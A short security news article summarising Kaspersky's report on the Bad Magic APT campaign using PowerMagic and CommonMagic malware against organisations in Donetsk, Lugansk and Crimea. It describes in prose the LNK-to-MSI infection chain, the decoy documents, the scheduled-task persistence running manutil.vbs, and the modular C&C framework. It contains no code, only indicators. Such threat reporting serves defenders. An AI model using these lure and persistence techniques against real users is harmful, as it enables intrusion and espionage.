Pro-Russian actors in Ukraine hit by PowerMagic and CommonMagic. Kaspersky cybersecurity experts: Victims navigate to a URL pointing to a ZIP archive with 2 files: a decoy document and a malicious LNK that leads to infection

PowerMagic and CommonMagic are two malware that are attacking Russian-friendly governments and organizations in Donetsk, Lugansk, and Crimea regions. Kaspersky cybersecurity experts discovered it, naming the new APT as Bad Magic. Victims are lured with spear phishing or similar methods. They navigate to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files: a decoy document (researchers discovered PDF, XLSX and DOCX versions) and a malicious LNK file with a double extension that leads to infection when opened. Furthermore, in several cases, the contents of the decoy document were directly related to the name of the malicious LNK to trick the user into activating it. The LNK points to a remotely hosted malicious MSI file that is downloaded and started by the Windows Installer executable. It is effectively a dropper package, containing an encrypted next-stage payload, a dropper script and a decoy document that is supposed to be displayed to the victim.

The second and final stage of the malware infection

The next-stage script finalizes the installation: it opens the decoy document to display it to the user, writes two files named config and manutil.vbs to %APPDATA%\WinEventCom, and creates a Task Scheduler job named WindowsActiveXTaskTrigger, to execute the wscript.exe%APPDATA%\WinEventCom\manutil.vbs command every day. The script manutil.vbs, which is dropped by the initial package, is a loader for a previously unknown backdoor written in PowerShell that Kaspersky named PowerMagic. All the victims of PowerMagic were also infected with a more complicated, previously unseen, modular malicious framework that the cybersecurity experts named CommonMagic. This framework was deployed after initial infection with the PowerShell backdoor, leading researchers to believe that CommonMagic is deployed via PowerMagic. The CommonMagic framework consists of several executable modules, all stored in the directory C:\ProgramData\CommonCommand. Modules start as standalone executable files and communicate via named pipes. There are dedicated modules for interaction with the C&C server, encryption and decryption of the C&C traffic and various malicious actions.